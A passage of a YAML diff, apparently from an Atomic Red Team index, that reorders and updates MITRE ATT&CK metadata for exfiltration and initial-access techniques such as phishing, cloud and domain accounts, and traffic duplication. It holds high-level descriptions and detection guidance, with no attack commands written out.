atomic_tests:
- name: Exfiltration Over Alternative Protocol - SSH
@@ -54017,18 +59656,8 @@ exfiltration:
atomic_tests: []
T1041:
technique:
- created: '2017-05-31T21:30:41.804Z'
- modified: '2020-03-12T15:59:47.470Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: exfiltration
- type: attack-pattern
- id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exfiltration Over C2 Channel
- description: Adversaries may steal data by exfiltrating it over an existing
- command and control channel. Stolen data is encoded into the normal communications
- channel using the same protocol as command and control communications.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1041
@@ -54037,26 +59666,36 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_network_requirements: true
+ description: Adversaries may steal data by exfiltrating it over an existing
+ command and control channel. Stolen data is encoded into the normal communications
+ channel using the same protocol as command and control communications.
+ name: Exfiltration Over C2 Channel
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: exfiltration
+ modified: '2020-03-12T15:59:47.470Z'
+ created: '2017-05-31T21:30:41.804Z'
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Netflow/Enclave netflow
+ - Process monitoring
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2)'
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Netflow/Enclave netflow
- - Process monitoring
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_network_requirements: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1011:
technique:
@@ -54194,18 +59833,13 @@ exfiltration:
atomic_tests: []
T1048.003:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1048.003
- url: https://attack.mitre.org/techniques/T1048/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
+ created: '2020-03-15T15:37:47.583Z'
+ modified: '2020-03-28T00:50:31.361Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: exfiltration
+ type: attack-pattern
+ id: attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
network protocol other than that of the existing command and control channel.
The data may also be sent to an alternate network location from the main command
@@ -54214,31 +59848,36 @@ exfiltration:
(such as HTTP, FTP, or DNS). This may include custom or publicly available
encoding/compression algorithms (such as base64) as well as embedding data
within protocol headers and fields. "
- id: attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: exfiltration
- modified: '2020-03-28T00:50:31.361Z'
- created: '2020-03-15T15:37:47.583Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_network_requirements: true
+ name: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1048.003
+ url: https://attack.mitre.org/techniques/T1048/003
+ - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ source_name: University of Birmingham C2
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Packet capture
+ - Process use of network
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2) '
- x_mitre_data_sources:
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Packet capture
- - Process use of network
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_network_requirements: true
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1048.003
atomic_tests:
- name: Exfiltration Over Alternative Protocol - HTTP
@@ -54510,6 +60149,65 @@ exfiltration:
- Process monitoring
x_mitre_version: '1.1'
atomic_tests: []
+ T1020.001:
+ technique:
+ created: '2020-10-19T13:40:11.118Z'
+ modified: '2020-10-22T02:24:54.640Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: exfiltration
+ type: attack-pattern
+ id: attack-pattern--7c46b364-8496-4234-8a56-f7e6727e21e1
+ description: |-
+ Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)
+
+ Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image](https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.
+ name: Traffic Duplication
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1020.001
+ url: https://attack.mitre.org/techniques/T1020/001
+ - external_id: CAPEC-117
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/117.html
+ - source_name: Cisco Traffic Mirroring
+ url: https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html
+ description: Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component
+ Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October
+ 19, 2020.
+ - source_name: Juniper Traffic Mirroring
+ url: https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html
+ description: Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200,
+ EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved
+ October 19, 2020.
+ - source_name: US-CERT-TA18-106A
+ url: https://www.us-cert.gov/ncas/alerts/TA18-106A
+ description: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored
+ Cyber Actors Targeting Network Infrastructure Devices. Retrieved October
+ 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
+ x_mitre_platforms:
+ - Network
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Packet capture
+ - Network protocol analysis
+ x_mitre_detection: 'Monitor network traffic for uncommon data flows (e.g. unusual
+ network communications, suspicious communications that have never been seen
+ before, communications sending fixed size data packets at regular intervals). Analyze
+ packet contents to detect communications that do not follow the expected protocol
+ behavior for the port that is being used. '
+ x_mitre_permissions_required:
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
T1537:
technique:
external_references:
@@ -54566,6 +60264,15 @@ exfiltration:
initial-access:
T1078.004:
technique:
+ id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
+ description: |-
+ Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
+
+ Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
+ name: Cloud Accounts
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.004
@@ -54582,15 +60289,6 @@ initial-access:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
description: Microsoft. (n.d.). Deploying Active Directory Federation Services
in Azure. Retrieved March 13, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Accounts
- description: |-
- Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
-
- Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment.
- id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -54601,21 +60299,8 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.729Z'
+ modified: '2020-10-19T16:01:22.090Z'
created: '2020-03-13T20:36:57.378Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal
- or malicious activity, such as accessing information outside of the normal
- function of the account or account usage at atypical hours.
- x_mitre_data_sources:
- - Azure activity logs
- - Authentication logs
- - AWS CloudTrail logs
- - Stackdriver logs
x_mitre_platforms:
- AWS
- GCP
@@ -54623,6 +60308,19 @@ initial-access:
- SaaS
- Azure AD
- Office 365
+ x_mitre_data_sources:
+ - Azure activity logs
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
+ or malicious behavior, such as accessing information outside of the normal
+ function of the account or account usage at atypical hours.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.1'
atomic_tests: []
T1195.003:
technique:
@@ -54760,6 +60458,9 @@ initial-access:
- source_name: mitre-attack
external_id: T1078.001
url: https://attack.mitre.org/techniques/T1078/001
+ - external_id: CAPEC-70
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/70.html
- source_name: Microsoft Local Accounts Feb 2019
url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts
description: Microsoft. (2018, December 9). Local Accounts. Retrieved February
@@ -54786,9 +60487,9 @@ initial-access:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:37:34.567Z'
+ modified: '2020-09-16T19:41:43.491Z'
created: '2020-03-13T20:15:31.974Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- Administrator
@@ -54839,31 +60540,13 @@ initial-access:
elevation_required: true
T1078.002:
technique:
- created: '2020-03-13T20:21:54.758Z'
- modified: '2020-03-23T21:08:40.063Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- type: attack-pattern
- id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
- description: |-
- Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
-
- Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
- name: Domain Accounts
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1078.002
url: https://attack.mitre.org/techniques/T1078/002
+ - external_id: CAPEC-560
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/560.html
- url: https://technet.microsoft.com/en-us/library/dn535501.aspx
description: Microsoft. (2016, April 15). Attractive Accounts for Credential
Theft. Retrieved June 3, 2016.
@@ -54876,22 +60559,43 @@ initial-access:
description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
June 3, 2016.
source_name: TechNet Audit Policy
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Authentication logs
- - Process monitoring
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Domain Accounts
+ description: |-
+ Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)
+
+ Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.
+ id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: initial-access
+ modified: '2020-09-16T19:42:11.787Z'
+ created: '2020-03-13T20:21:54.758Z'
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1189:
technique:
@@ -54984,8 +60688,27 @@ initial-access:
atomic_tests: []
T1190:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ id: attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Exploit Public-Facing Application
+ description: "Adversaries may attempt to take advantage of a weakness in an
+ Internet-facing computer or program using software, data, or commands in order
+ to cause unintended or unanticipated behavior. The weakness in the system
+ can be a bug, a glitch, or a design vulnerability. These applications are
+ often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662),
+ standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or
+ SSH), network device administration and management protocols (like SNMP and
+ Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation:
+ Cisco Blog Legacy Device Attacks)), and any other applications with Internet
+ accessible open sockets, such as web servers and related services.(Citation:
+ NVD CVE-2014-7169) Depending on the flaw being exploited this may include
+ [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).
+ \n\nIf an application is hosted on cloud-based infrastructure, then exploiting
+ it may lead to compromise of the underlying instance. This can allow an adversary
+ a path to access the cloud APIs or to take advantage of weak identity and
+ access management policies.\n\nFor websites and databases, the OWASP top 10
+ and CWE top 25 highlight the most common web-based vulnerabilities.(Citation:
+ OWASP Top 10)(Citation: CWE top 25)"
external_references:
- source_name: mitre-attack
external_id: T1190
@@ -54998,6 +60721,14 @@ initial-access:
description: CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows
SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.
source_name: CIS Multiple SMB Vulnerabilities
+ - source_name: US-CERT TA18-106A Network Infrastructure Devices 2018
+ url: https://us-cert.cisa.gov/ncas/alerts/TA18-106A
+ description: US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors
+ Targeting Network Infrastructure Devices. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
- url: https://nvd.nist.gov/vuln/detail/CVE-2014-7169
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
@@ -55011,25 +60742,26 @@ initial-access:
description: Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011,
September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved
April 10, 2019.
- description: |-
- Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).
-
- If an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.
-
- For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)
- name: Exploit Public-Facing Application
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-02-18T16:10:38.866Z'
+ modified: '2020-10-21T01:10:54.358Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Praetorian
- x_mitre_version: '2.1'
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - AWS
+ - GCP
+ - Azure
+ - Network
+ x_mitre_detection: Monitor application logs for abnormal behavior that may indicate
+ attempted or successful exploitation. Use deep packet inspection to look for
+ artifacts of common exploit traffic, such as SQL injection. Web Application
+ Firewalls may detect improper inputs attempting exploitation.
x_mitre_data_sources:
- Azure activity logs
- AWS CloudTrail logs
@@ -55038,17 +60770,10 @@ initial-access:
- Web logs
- Web application firewall logs
- Application logs
- x_mitre_detection: Monitor application logs for abnormal behavior that may indicate
- attempted or successful exploitation. Use deep packet inspection to look for
- artifacts of common exploit traffic, such as SQL injection. Web Application
- Firewalls may detect improper inputs attempting exploitation.
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- - AWS
- - GCP
- - Azure
+ x_mitre_version: '2.2'
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1133:
technique:
@@ -55158,8 +60883,11 @@ initial-access:
March 2012), and others.'
external_references:
- source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1200
external_id: T1200
+ url: https://attack.mitre.org/techniques/T1200
+ - external_id: CAPEC-440
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/440.html
- url: https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html
description: Michael Ossmann. (2011, February 17). Throwing Star LAN Tap.
Retrieved March 30, 2018.
@@ -55187,7 +60915,7 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-07-14T19:36:40.493Z'
+ modified: '2020-09-16T16:12:48.086Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_is_subtechnique: false
x_mitre_platforms:
@@ -55201,7 +60929,7 @@ initial-access:
x_mitre_data_sources:
- Asset management
- Data loss prevention
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
atomic_tests: []
T1078.003:
technique:
@@ -55252,6 +60980,15 @@ initial-access:
atomic_tests: []
T1566:
technique:
+ id: attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b
+ description: |-
+ Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+ Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms.
+ name: Phishing
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1566
@@ -55259,21 +60996,28 @@ initial-access:
- external_id: CAPEC-98
source_name: capec
url: https://capec.mitre.org/data/definitions/98.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Phishing
- description: |-
- Adversaries may send phishing messages to elicit sensitive information and/or gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
-
- Adversaries may send victim’s emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms.
- id: attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-28T00:04:46.427Z'
+ modified: '2020-10-18T01:55:03.337Z'
created: '2020-03-02T18:45:07.892Z'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - SaaS
+ - Office 365
+ x_mitre_detection: |-
+ Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
+
+ URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
+
+ Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
+
+ Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- File monitoring
- Packet capture
@@ -55284,22 +61028,6 @@ initial-access:
- Detonation chamber
- SSL/TLS inspection
- Anti-virus
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_detection: |-
- Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
-
- URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
-
- Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
-
- Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - SaaS
- - Office 365
atomic_tests: []
T1091:
technique:
@@ -55362,7 +61090,7 @@ initial-access:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Spearphishing Attachment
description: |-
- Adversaries may send spearphishing emails with a malicious attachment in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.
+ Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.
There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
id: attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597
@@ -55370,9 +61098,9 @@ initial-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-27T23:56:40.369Z'
+ modified: '2020-10-18T01:52:25.316Z'
created: '2020-03-02T19:05:18.137Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
@@ -55458,33 +61186,26 @@ initial-access:
name: powershell
T1566.002:
technique:
- created: '2020-03-02T19:15:44.182Z'
- modified: '2020-03-02T19:44:47.843Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: initial-access
- type: attack-pattern
id: attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7
description: "Adversaries may send spearphishing emails with a malicious link
- in an attempt to elicit sensitive information and/or gain access to victim
- systems. Spearphishing with a link is a specific variant of spearphishing.
